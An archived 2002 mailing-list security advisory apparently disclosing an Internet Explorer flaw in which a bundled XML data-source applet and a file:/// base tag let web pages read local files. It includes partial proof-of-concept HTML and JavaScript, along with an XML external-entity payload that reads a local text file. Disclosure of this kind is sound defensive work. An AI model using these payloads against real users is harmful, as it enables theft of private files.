Internet explorer can read local files

From: Jelmer (jelmerat_private)
Date: Sat Aug 17 2002 - 10:57:32 PDT

  • Next message: Jelmer: "Enableing java logging in MSIE is dangerous"

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    Description :
    There is a bug in internet explorer which allows reading and sending of
    local files.
    The problem lies in a legacy XML Datasource applet shipped with internet
    explorer since its 4.0 release
    it is used in a page like this
    <applet code="" width="0" height="0" id="xmldso"
    as you can see you dont specify a jar or cab file where the class is loaded
    from, apperently it is added to the classpath
    from a local file.
    It gets nasty when you add a <base href="file:///C:/"> tag to the head
    section, the applet now thinks it's codebase is local
    and you are allowed to read local xml files
    So this snippet will read c:\jelmer.xml
     <base href="file:///C:/">
     <applet code="" width=100% height=50 id="xmldso"
      <PARAM NAME="url" VALUE="jelmer.xml">
     <script language="javascript">
      function showIt() {
       var jelmer = xmldso.getDocument();
    reading local xml files is bad enough but there is more that can be done
    xml has a feature called external entities wich allows you to combine
    multiple files as one big file
    This allows us to read text files aswell as shown by the following example :
     <base href="file:///C:/">
     <applet code="" width="0" height="0" id="xmldso"
      <?xml version="1.0"?>
      <!DOCTYPE file  [
        <!ELEMENT file (#PCDATA) >
        <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">
     <script language="javascript">
      function showIt() {
       var jelmer = xmldso.getDocument();
    Systems affected :
    The exploit has been confirmed to work on Windows 2000 and windows XP both
    fully patched.
    However I believe it will work on any IE browser since the 4.0 release
    example :
    A Demonstration of the issue described is available at :
    It reads and displays the contents of c:\jelmer.txt
    Vendor status :
    Microsoft was notified 2 days ago, I have yet to recieve a reply.
    I really don't care to wait any longer The fact that I am still a bit
    disgruntaled that they didn't have the
    decentsy to reply to the microsoft help bufferoverflow issue I reported to
    them (wich is exploitable) may have influenced
    my patience a little. Thats trustwothy computing for you, they spend 100's
    of millions on making microsoft products more secure
    yet where reporting vulnerabilities to them, as drew copely put it
    "One would think there was one guy doing it all and this
    guy isn't coming into work."
    Workaround :
    Disable java all together or install the sun jdk it does not seem affected
    references :
    previous vulnerablilities :
    "Macromedia flash! local file reading"
    "Winamp allows execution of arbitrary code"
    "ICQ allows execution of arbitrary code"
    "Windows media player allows execution of arbitrary code"
    "MS XMLHTTP component allows local file reading"

    This archive was generated by hypermail 2b30 : Sat Aug 17 2002 - 11:04:51 PDT